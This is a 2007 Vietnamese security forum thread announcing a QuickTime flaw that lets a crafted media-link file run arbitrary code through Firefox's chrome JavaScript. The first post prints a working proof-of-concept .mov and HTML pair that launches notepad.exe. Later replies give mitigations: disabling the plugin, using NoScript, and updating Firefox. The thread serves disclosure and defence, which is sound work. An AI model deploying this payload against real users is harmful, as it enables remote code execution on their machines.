English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits 0DAY: QuickTime pwns Firefox  XML
  [Announcement]   0DAY: QuickTime pwns Firefox 19/09/2007 01:39:45 (+0700) | #1 | 85634
mfeng
Researcher
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
0DAY: QuickTime pwns Firefox

ISSUE
Petko D. Petkov identified an issue in Quicktime that allows an attacker to execute arbitrary code.

IMPACT
Vulnerable System: Firefox 2.0.0.6 and below.

If Firefox is the default browser when a user plays a malicious media file handled by Quicktime, an attacker can use a vulnerability in Quicktime to compromise Firefox or the local machine. This can happen while browsing or by opening a malicious media file directly in Quicktime. So far this is only reproducible on Windows.

Petkov provided proof of concept code that may be easily converted into an exploit, so users should consider this a very serious issue.

EXPLOIT

Following exploit code will execute notepad.exe

a.mov
Code:
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\notepad.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>
a.html
Code:
<html>
<body>
<a href = "a.mov">a.mp3</a>
</body>
</html>


ADDITIONAL INFORMATION
More information here: http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/
[Up] [Print Copy]
  [Question]   Re: 0DAY: QuickTime pwns Firefox 19/09/2007 01:53:38 (+0700) | #2 | 85635
mfeng
Researcher
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
Giải pháp hiện tại: disable plugin Quicktime của firefox

Trong C:\Program Files\Mozilla Firefox\plugins, có các file npqtplugin?.dll. Đổi tên thành *.dlx hoặc dời sang thư mục khác.
[Up] [Print Copy]
  [Question]   Re: 0DAY: QuickTime pwns Firefox 19/09/2007 05:48:40 (+0700) | #3 | 85666
[Avatar]
 gsmth
Elite Member
[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

pdp responds wrote:

I would recommend to install NoScript if you are a Firefox user and switch to Firefox with NoScript if you use any other browser. When a fix is available, restore your settings.
 
[Up] [Print Copy]
  [Question]   Re: 0DAY: QuickTime pwns Firefox 24/09/2007 11:16:34 (+0700) | #4 | 86567
[Avatar]
 blueocean89
Member
[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]
using No Script may cause some problem in sufering the web, coz some website have script enabled to work! smilie so...disabling plugin is better.
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: 0DAY: QuickTime pwns Firefox 24/09/2007 13:59:19 (+0700) | #5 | 86580
mfeng
Researcher
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
Đã có Firefox 2.0.0.7 rồi. Không cần phải lo về bug này nữa smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|